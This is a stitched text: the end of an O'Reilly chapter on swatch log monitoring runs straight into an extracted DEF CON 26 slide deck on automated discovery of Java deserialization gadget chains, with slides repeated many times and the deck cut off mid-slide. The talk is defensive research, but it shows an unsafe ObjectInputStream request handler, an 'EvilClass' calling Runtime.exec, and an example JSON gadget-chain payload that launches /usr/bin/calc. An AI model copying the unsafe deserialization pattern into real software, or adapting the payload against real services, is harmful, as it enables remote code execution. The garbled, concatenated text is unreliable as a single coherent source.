same .swatchrc file, you’d add something like Example 10-29. You will only see these messages and hear these beeps if you are logged on to the console in the same shell session from which you launched swatch. If you log out to go get a sandwich, when you return and log back in, you will no longer see messages generated by the swatch processes launched in your old session, even though those pro- cesses will still be running. When in doubt, add either a “mail” action or some other non console-specific action (e.g., an “exec” action that triggers a script that pages you, etc.), unless, that is, the pattern in question isn’t critical. Alert readers have no doubt noticed that the scenario in the previous example will work only for Apache installations in which both errors and access messages are logged to the same file. We haven’t associated different expressions with different watched files, nor can we. But what if you want swatch to watch more than one log file? This is no problem. Although each .swatchrc file may describe only one watched file, there’s nothing to stop you from running multiple instances of swatch, each with its own .swatchrc file. In other words, .swatchrc is the default, but not the required name for swatch configurations. To split our two examples into two files, you’d put the lines in Example 10-27 into a file called, for example, .swatchrc.hterror and the lines in Example 10-28 into a file called .swatchrc.htaccess. Advanced swatch Configuration So far we’ve only considered actions we want triggered every time a given pattern is matched. There are several ways we can control swatch’s behavior with greater gran- ularity, however. The first and most obvious is that search patterns take the form of regular expres- sions. Regular expressions, which really constitute a text-formatting language of their own, are incredibly powerful and responsible for a good deal of the magic of Perl, sed, vi, and many other Unix utilities. Example 10-29. An event that beeps and prints to console watchfor /wuzza.html/ echo=red bell 2 This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Using Swatch for Automated Log Monitoring | 359 It behooves you to know at least a couple “regex” tricks. Trick number one is called alternation, and it adds a “logical or” to your regular expression in the form of a “|” sign. Consider this regular expression: /reject|failed/ This expression will match any line containing either the word “reject” or the word “failed.” Use alternation when you want swatch to take the same action for more than one pattern. Trick number two is the Perl-specific regular-expression modifier “case-insensitive,” also known as “slash-i” since it always follows a regular expression’s trailing slash. The regular expression: /reject/i matches any line containing the word “reject” whether it’s spelled “Reject,” “REJECT,” “rEjEcT,” etc. Granted, this isn’t nearly as useful as alternation, and in the interest of full disclosure, I’m compelled to mention that slash-i is one of the more CPU-intensive Perl modifiers. However, if despite your best efforts at log tail- ing, self attacking, etc., you aren’t 100% sure how a worrisome attack might look in a log file, slash-i helps you make a reasonable guess. Another way to control swatch more precisely is to specify what time of day a given action may be performed. You can do this by sticking a when= option after any action. For example, in Example 10-30, I have a .swatchrc entry for a medium-impor- tance event, which I want to know about via console messages during weekdays, but which I’ll need email messages to know about during the weekend. The syntax of the when= option is when=range_of_days:range_of_hours. Thus, in Example 10-30, we see that any time the message “file system full” is logged, swatch will echo the log entry to the console in red ink. It will also send email, but only if it’s Saturday (“7”) or Sunday (“1”). Running swatch Swatch expects .swatchrc to live in the home directory of the user who invokes swatch. Swatch also keeps its temporary files there by default. (Each time it’s invoked, it creates and runs a script called a “watcher process,” whose name ends with a dot followed by the PID of the swatch process that created it). The -c path/to/configfile and --script-dir=/path/to/scripts flags let you specify alternate locations for swatch’s configuration and script files, respectively. Never Example 10-30. Actions with when option specified /file system full/ echo=red mail addresses=mick\@visi.com,subject=Volume_Full,when=7-1:1-24 This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 360 | Chapter 10: System Log Management and Monitoring keep either in a world-writable directory, however. In fact, only these files’ owners should be able to read them. For example, to invoke swatch so that it reads my custom configuration file in /var/ log and also uses that directory for its watcher process script, I’d use the command listed in Example 10-31. I also need to tell swatch which file to tail, and for that I need the -t filename flag. If I wanted to use the previous command to have swatch monitor /var/log/apache/access_ log, it would look like this: mylinuxbox:~# swatch -c /var/log/.swatchrc.access --script-dir=/var/log \ -t /var/log/apache/access_log & swatch generally doesn’t clean up after itself very well; it tends to leave watcher-process scripts behind. Keep an eye out and periodically delete these in your home directory or in the script directories you tend to specify with --script-dir. Again, if you want swatch to monitor multiple files, you’ll need to run swatch multi- ple times, with at least a different tailing target (-t value) specified each time and probably a different configuration file for each as well. Fine-Tuning swatch Once swatch is configured and running, we must turn our attention to the Gold- ilocks Goal: we want swatch to be running neither “too hot” (alerting us about rou- tine or trivial events) nor “too cold” (never alerting us about anything). But what constitutes “just right?” There are as many answers to this question as there are uses for Unix. Anyhow, you don’t need me to tell you what constitutes nuisance-level reporting: if it happens, you’ll know it. You may even experience a scare or two in responding to events that set off alarms appropriately but turn out to be harmless nonetheless. Read the manual, tweak .swatchrc, and stay the course. The other scenario, in which too little is watched for, is much harder to address, espe- cially for the beginning system administrator. By definition, anomalous events don’t happen very frequently, so how do you anticipate how they’ll manifest themselves in the logs? My first bit of advice is to get in the habit of browsing your system logs often enough to get a feel for what the routine operation of your systems looks like. Better still, “tail” the logs in real time. If you enter the command tail -f /var/log/ messages, the last 50 lines of the system log will be printed, plus all subsequent lines, Example 10-31. Specifying nondefault paths mylinuxbox:~# swatch -c /var/log/.swatchrc.access --script-dir=/var/log & This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Resources | 361 as they’re generated, until you kill tail with a Control-c. This works for any file, even a log file that changes very rapidly. Another good thing you can do is to “beat up on” (probe/attack) your system in one virtual console or xterm while tailing various log files in another. nmap and Nessus, which are covered in Chapter 3 (Hardening Linux), are perfect for this. By now you may be saying, “Hey, I thought the whole reason I installed swatch was so I wouldn’t have to watch log files manually!” Wrong. Swatch minimizes, but does not eliminate, the need for us to parse log files. Were you able to quit using your arithmetic skills after you got your first pocket cal- culator? No. For that matter, can you use a calculator in the first place unless you already know how to add, multiply, etc.? Definitely not. The same goes for log file parsing: you can’t tell swatch to look for things you can’t identify yourself, no more than you can ask for directions to a town whose name you’ve forgotten. Why You Shouldn’t Configure swatch Once and Forget About It In the same vein, I urge you to not be complacent about swatch silence. If swatch’s actions don’t fire very often, it could be that your system isn’t getting probed or mis- used very much, but it’s at least as likely that swatch isn’t casting its net wide enough. Continue to periodically scan through your logs manually to see if you’re missing anything, and continue to tweak .swatchrc. Don’t forget to periodically reconsider the auditing/logging configurations of the daemons that generate log messages in the first place. Swatch won’t catch events that aren’t logged at all. Refer to the syslogd(8) manpage for general instructions on man- aging your syslogd daemon, and the manpages of the various things that log to sys- log for specific instructions on changing the way they log events. Resources http://www.stanford.edu/~atkins/swatch. swatch home page. (Has links to the latest version, online manpages, etc.) http://www.stanford.edu/~atkins/swatch/lisa93.html. Hansen, Stephen and Todd Atkins, creators of swatch. “Centralized System Monitoring with Swatch.” (Old, but still useful.) http://www.enteract.com/~lspitz/swatch.html. Spitzner, Lance. “Watching Your Logs.” (A brief introduction to swatch.) Friedl, Jeffrey E. F. Mastering Regular Expressions. Sebastopol, CA: O’Reilly & Asso- ciates, Inc. 1998.
Automated Discovery of Deserialization Gadget Chains Ian Haken DEF CON 26, 2018 Automated Discovery of Deserialization Gadget Chains Ian Haken $ whoami Senior Security Software Engineer on Netflix’s Platform Security team. Netflix is a microservice ecosystem and we build security services and libraries to keep those applications safe: ● Secrets at Scale ● Crypto as a service ● Netflix-wide Authorization @ianhaken https://github.com/JackOfMostTrades Automated Discovery of Deserialization Gadget Chains Ian Haken Deserialization Gadget Chains ● What is a deserialization vulnerability? ● A brief history of deserialization vulnerabilities ● What is a deserialization gadget chain? ● Why focus on gadget chains? ● Building a tool to find gadget chains ● Exploits discovered Automated Discovery of Deserialization Gadget Chains Ian Haken W hat is a Deserialization Vulnerability? Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. W hat is a Deserialization Vulnerability? Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnerability? Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnerability? @POST public String renderUser( HttpServletRequest request) { ObjectInputStream ois = new ObjectInputStream( request.getInputStream()); User user = (User) ois.readObject(); return user.render(); } Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnerability? @POST public String renderUser( HttpServletRequest request) { ObjectInputStream ois = new ObjectInputStream( request.getInputStream()); User user = (User) ois.readObject(); return user.render(); } public class User { private String name; public String render() { return name; } } Automated Discovery of Deserialization Gadget Chains Ian Haken In object oriented languages (like Java), data is contained in classes and classes contain code. Controlling Data Types => Controlling Code! W hat is a Deserialization Vulnerability? @POST public String renderUser( HttpServletRequest request) { ObjectInputStream ois = new ObjectInputStream( request.getInputStream()); User user = (User) ois.readObject(); return user.render(); } public class User { private String name; public String render() { return name; } } public class ThumbnailUser extends User { private File thumbnail; public String render() { return Files.read(thumbnail); } } Automated Discovery of Deserialization Gadget Chains Ian Haken Deserialization? That’s so 2016... 1 http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Schoenefeld-up.pdf 2 https://frohoff.github.io/appseccali-marshalling-pickles/ 3 https://www.slideshare.net/ikkisoft/defending-against-java-deserialization-vulnerabilities 4 https://www.blackhat.com.docs.us-17.thursday.us-17-Munoz-Friday-The-13th-Json-Attacks.pdf 5 https://appsecus2018.sched.com/event/F04J Automated Discovery of Deserialization Gadget Chains Ian Haken ● 2006: Pentesting J2EE, Black Hat 2006, Marc Schönefeld1 Deserialization? That’s so 2016... 1 http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Schoenefeld-up.pdf 2 https://frohoff.github.io/appseccali-marshalling-pickles/ 3 https://www.slideshare.net/ikkisoft/defending-against-java-deserialization-vulnerabilities 4 https://www.blackhat.com.docs.us-17.thursday.us-17-Munoz-Friday-The-13th-Json-Attacks.pdf 5 https://appsecus2018.sched.com/event/F04J Automated Discovery of Deserialization Gadget Chains Ian Haken ● 2006: Pentesting J2EE, Black Hat 2006, Marc Schönefeld1 ● 2015: Marshalling Pickles, AppSecCali 2015, Frohoff and Lawrence2 Deserialization? That’s so 2016... 1 http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Schoenefeld-up.pdf 2 https://frohoff.github.io/appseccali-marshalling-pickles/ 3 https://www.slideshare.net/ikkisoft/defending-against-java-deserialization-vulnerabilities 4 https://www.blackhat.com.docs.us-17.thursday.us-17-Munoz-Friday-The-13th-Json-Attacks.pdf 5 https://appsecus2018.sched.com/event/F04J Automated Discovery of Deserialization Gadget Chains Ian Haken ● 2006: Pentesting J2EE, Black Hat 2006, Marc Schönefeld1 ● 2015: Marshalling Pickles, AppSecCali 2015, Frohoff and Lawrence2 ● 2016: Defending against Java Deserialization Vulnerabilities, Bay Area OWASP Meetup, September 2016, Luca Carettoni3 Deserialization? That’s so 2016... 1 http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Schoenefeld-up.pdf 2 https://frohoff.github.io/appseccali-marshalling-pickles/ 3 https://www.slideshare.net/ikkisoft/defending-against-java-deserialization-vulnerabilities 4 https://www.blackhat.com.docs.us-17.thursday.us-17-Munoz-Friday-The-13th-Json-Attacks.pdf 5 https://appsecus2018.sched.com/event/F04J Automated Discovery of Deserialization Gadget Chains Ian Haken ● 2006: Pentesting J2EE, Black Hat 2006, Marc Schönefeld1 ● 2015: Marshalling Pickles, AppSecCali 2015, Frohoff and Lawrence2 ● 2016: Defending against Java Deserialization Vulnerabilities, Bay Area OWASP Meetup, September 2016, Luca Carettoni3 ● 2017: Friday the 13th: JSON Attacks, Black Hat 2017, Muñoz and Mirosh4 Deserialization? That’s so 2016... 1 http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Schoenefeld-up.pdf 2 https://frohoff.github.io/appseccali-marshalling-pickles/ 3 https://www.slideshare.net/ikkisoft/defending-against-java-deserialization-vulnerabilities 4 https://www.blackhat.com.docs.us-17.thursday.us-17-Munoz-Friday-The-13th-Json-Attacks.pdf 5 https://appsecus2018.sched.com/event/F04J Automated Discovery of Deserialization Gadget Chains Ian Haken ● 2006: Pentesting J2EE, Black Hat 2006, Marc Schönefeld1 ● 2015: Marshalling Pickles, AppSecCali 2015, Frohoff and Lawrence2 ● 2016: Defending against Java Deserialization Vulnerabilities, Bay Area OWASP Meetup, September 2016, Luca Carettoni3 ● 2017: Friday the 13th: JSON Attacks, Black Hat 2017, Muñoz and Mirosh4 ● 2018: Deserialization: what, how and why [not], AppSec USA, October 2018, Alexei Kojenov5 Deserialization? That’s so 2016... 1 http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Schoenefeld-up.pdf 2 https://frohoff.github.io/appseccali-marshalling-pickles/ 3 https://www.slideshare.net/ikkisoft/defending-against-java-deserialization-vulnerabilities 4 https://www.blackhat.com.docs.us-17.thursday.us-17-Munoz-Friday-The-13th-Json-Attacks.pdf 5 https://appsecus2018.sched.com/event/F04J Automated Discovery of Deserialization Gadget Chains Ian Haken Magic methods get executed automatically by the deserializer, even before deserialization finishes! W hy are Deserialization Vulnerabilities so Bad? Automated Discovery of Deserialization Gadget Chains Ian Haken Magic methods get executed automatically by the deserializer, even before deserialization finishes! W hy are Deserialization Vulnerabilities so Bad? @POST public String renderUser( HttpServletRequest request) { ObjectInputStream ois = new ObjectInputStream( request.getInputStream()); User user = (User) ois.readObject(); return user.render(); } Automated Discovery of Deserialization Gadget Chains Ian Haken Magic methods get executed automatically by the deserializer, even before deserialization finishes! W hy are Deserialization Vulnerabilities so Bad? @POST public String renderUser( HttpServletRequest request) { ObjectInputStream ois = new ObjectInputStream( request.getInputStream()); User user = (User) ois.readObject(); return user.render(); } public class EvilClass { public void readObject( ObjectInputStream ois) { Runtime.exec(ois.readObject()); } } Automated Discovery of Deserialization Gadget Chains Ian Haken ● readObject() and readResolve() are the main ones… ○ But don’t forget about finalize()! ● Many serializable JDK classes implement these magic methods and call other methods, so there’s a lot of additional “known entrypoints.” ○ HashMap ■ Object.hashCode() ■ Object.equals() ○ PriorityQueue ■ Comparator.compare() ■ Comparable.compareTo() Magic methods? Automated Discovery of Deserialization Gadget Chains Ian Haken Magic Methods to Gadget Chains public class HashMap<K,V> implements Map<K,V> { private void readObject(ObjectInputStream s) { int mappings = s.readInt(); for (int i = 0; i < mappings; i++) { K key = (K) s.readObject(); V value = (V) s.readObject(); putVal(key.hashCode(), key, value); } } } Automated Discovery of Deserialization Gadget Chains Ian Haken Magic Methods to Gadget Chains public class HashMap<K,V> implements Map<K,V> { private void readObject(ObjectInputStream s) { int mappings = s.readInt(); for (int i = 0; i < mappings; i++) { K key = (K) s.readObject(); V value = (V) s.readObject(); putVal(key.hashCode(), key, value); } } } public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Automated Discovery of Deserialization Gadget Chains Ian Haken Magic Methods to Gadget Chains public class HashMap<K,V> implements Map<K,V> { private void readObject(ObjectInputStream s) { int mappings = s.readInt(); for (int i = 0; i < mappings; i++) { K key = (K) s.readObject(); V value = (V) s.readObject(); putVal(key.hashCode(), key, value); } } } public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } Automated Discovery of Deserialization Gadget Chains Ian Haken Magic Methods to Gadget Chains public class HashMap<K,V> implements Map<K,V> { private void readObject(ObjectInputStream s) { int mappings = s.readInt(); for (int i = 0; i < mappings; i++) { K key = (K) s.readObject(); V value = (V) s.readObject(); putVal(key.hashCode(), key, value); } } } public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Automated Discovery of Deserialization Gadget Chains Ian Haken Magic Methods to Gadget Chains public class HashMap<K,V> implements Map<K,V> { private void readObject(ObjectInputStream s) { int mappings = s.readInt(); for (int i = 0; i < mappings; i++) { K key = (K) s.readObject(); V value = (V) s.readObject(); putVal(key.hashCode(), key, value); } } } public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } public class FnEval implements IFn { public Object invoke(Object arg) { return Runtime.exec(arg); } } Automated Discovery of Deserialization Gadget Chains Ian Haken Example Payload { “@class”: “java.util.HashMap” “members”: [ 2, { “@class”: “AbstractTableModel$ff19274a” __clojureFnMap: { hashCode: { “@class”: “FnCompose” f2: { “@class”: “FnConstant”, value: “/usr/bin/calc” }, f1: { “@class”: “FnEval” } } } }, “val” ] } W hat gadget chains are in your application has nothing to do with code your application is calling! Possible gadget chains are influenced by the cumulative collection of all transitive dependencies for your application Automated Discovery of Deserialization Gadget Chains Ian Haken W hat (Java) Libraries are Vulnerable? ● JDK (ObjectInputStream) ● XStream (XML, JSON) ● Jackson (JSON) ● Genson (JSON) ● JSON-IO (JSON) ● FlexSON (JSON) Libraries have different behavior about what classes they’ll deserialize and what “magic methods” can automatically be invoked. Keep this in mind for later… ! Spend some time reading Muñoz and Mirosh! Automated Discovery of Deserialization Gadget Chains Ian Haken Finding Vulnerabilities ● Finding potential vulnerabilities is similar to finding many application security issues: ○ Does untrusted input (e.g. a request’s body or input stream) flow into one of the sinks for this vulnerability type? ○ Existing static and dynamic tools are pretty good at discovery ObjectInputStream.readObject() XStream.fromXML() ObjectMapper.readValue() Automated Discovery of Deserialization Gadget Chains Ian Haken Remediation Options Automated Discovery of Deserialization Gadget Chains Ian Haken ● Why not use a better serialization strategy? Remediation Options Automated Discovery of Deserialization Gadget Chains Ian Haken ● Why not use a better serialization strategy? ○ “It’s 2016, there are better options.” -Luca Carettoni Remediation Options Automated Discovery of Deserialization Gadget Chains Ian Haken ● Why not use a better serialization strategy? ○ “It’s 2016, there are better options.” -Luca Carettoni Remediation Options Automated Discovery of Deserialization Gadget Chains Ian Haken ● Why not use a better serialization strategy? ○ “It’s 2016, there are better options.” -Luca Carettoni Remediation Options ● Is it worth the effort to remediate? How should we prioritize remediation? Is my deserialization vulnerability exploitable? Automated Discovery of Deserialization Gadget Chains Ian Haken Finding Exploits ● Known exploits in a few projects: ○ ysoserial: Usually limited to chains in particular libraries and focused on JDK ObjectInputStream ○ marshalsec: Wider breadth of exploits for alternative deserialization libraries ● But what about… ○ The specific combination of libraries on my classpath? ○ The non-standard deserialization library that I’m using? Automated Discovery of Deserialization Gadget Chains Ian Haken Existing Gadget Chain Tools ● ysoserial1 ○ Collection of known gadget chains and exploits ● joogle2 ○ Programatically query about types/methods on the classpath ● Java Deserialization Scanner3 ○ Burp Suite plugin; uses known payloads (ysoserial) to discover and exploit vulns. ● marshalsec4 ○ Deserialization payload generator for numerous libraries and gadget chains ● NCC Group Burp Plugin5 ○ “Mainly based on the work of Muñoz and Mirosh’s Friday the 13th: JSON Attacks” 1 https://github.com/frohoff/ysoserial 2 https://github.com/Contrast-Security-OSS/joogle 3 https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/ 4 https://github.com/mbechler/marshalsec 5 https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/ Automated Discovery of Deserialization Gadget Chains Ian Haken Building a New Tool to Find Gadget Chains What we really want is a tool to evaluate risk. How important is it to remediate this vulnerability? ● Is a given deserialization vulnerability exploitable? ● What exploits are possible? RCE, SSRF, DoS? ● It doesn’t need to be perfect; a reasonable overestimation of risk is useful in this context. ● Note: we don’t actually have to actually generate payloads. Automated Discovery of Deserialization Gadget Chains Ian Haken Requirements ● Not looking for vulnerabilities; assume we only use this tool if we find a vulnerability ● It needs to look at the entire classpath of the application ● It should err on the side of false positives rather than false negatives ● It should operate on bytecode; we usually have the entire classpath packaged as a war and may not have sources (especially if we’re including proprietary, third-party libraries) ○ Plus it may include libraries written in Groovy, Scala, Clojure, ... Gadget Inspector A Java bytecode analysis tool for finding gadget chains. Automated Discovery of Deserialization Gadget Chains Ian Haken ● Operates on any given classpath, i.e. a particular library or an entire war ● Reports discovered gadget chains as a sequence of method invocations ● Performs some simplistic symbolic execution to understand possible dataflow from method arguments to subsequent method invocations ● Makes a lot of simplifying assumptions that make code analysis easy Gadget Inspector Gadget Inspector ● CertificateRevokedException.readObject() ● Collections$CheckedMap.put() ● TreeMap.put() ● scala/math/Ordering$$anon$5.compare() ● scala/PartialFunction$OrElse.apply() ● ... app.war Automated Discovery of Deserialization Gadget Chains Ian Haken Step 1: Enumerate class/method hierarchy app.war ● clojure/FnEval ○ clojure/IFn ○ java/io/Serializable ○ java/lang/Object ● clojure/FnConstant ○ clojure/IFn ○ java/io/Serializable ○ java/lang/Object ● clojure/FnCompose ○ clojure/IFn ○ java/io/Serializable ○ java/lang/Object ● AbstractTableModel$ff19274a ○ java/io/Serializable ○ java/lang/Object WEB-INF/lib WEB-INF/classes Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow Assumption #1: All members of a “tainted” object are also tainted (and recursively, etc) Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow Assumption #1: All members of a “tainted” object are also tainted (and recursively, etc) ● FnConstant.invoke() -> 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow public class FnDefault { private FnConstant f; public Object invoke(Object arg) { return arg != null ? arg : f.invoke(arg); } } Assumption #1: All members of a “tainted” object are also tainted (and recursively, etc) ● FnConstant.invoke() -> 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow public class FnDefault { private FnConstant f; public Object invoke(Object arg) { return arg != null ? arg : f.invoke(arg); } } Assumption #1: All members of a “tainted” object are also tainted (and recursively, etc) ● FnConstant.invoke() -> 0 Assumption #2: All branch conditions are satisfiable Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow public class FnDefault { private FnConstant f; public Object invoke(Object arg) { return arg != null ? arg : f.invoke(arg); } } Assumption #1: All members of a “tainted” object are also tainted (and recursively, etc) ● FnConstant.invoke() -> 0 Assumption #2: All branch conditions are satisfiable ● FnDefault.invoke() -> 1 ● FnDefault.invoke() -> 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class FnConstant implements IFn { private Object value; public Object invoke(Object arg) { return value; } } Step 2: Discover “Passthrough” Dataflow public class FnDefault { private FnConstant f; public Object invoke(Object arg) { return arg != null ? arg : f.invoke(arg); } } Assumption #1: All members of a “tainted” object are also tainted (and recursively, etc) ● FnConstant.invoke() -> 0 Assumption #2: All branch conditions are satisfiable ● FnDefault.invoke() -> 1 ● FnDefault.invoke() -> 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 3: Enumerate “Passthrough” Callgraph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 public class FnCompose implements IFn { private IFn f1, f2; public Object invoke(Object arg) { return f2.invoke(f1.invoke(arg)); } } Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 4: Enumerate Sources Using Known Tricks Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 4: Enumerate Sources Using Known Tricks AbstractTableModel$ff19274a.hashCode() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken public class AbstractTableModel$ff19274a { private IPersistentMap __clojureFnMap; public int hashCode() { IFn f = __clojureFnMap.get("hashCode"); return (int)(f.invoke(this)); } } Step 4: Enumerate Sources Using Known Tricks AbstractTableModel$ff19274a.hashCode() @ 0 Limitation #1: Relies on known tricks. Some tricks (e.g. HashMap -> hashCode) we could derive anyway, but others (like DynamicProxy) we could not. Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain ● AbstractTableModel...hashCode() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 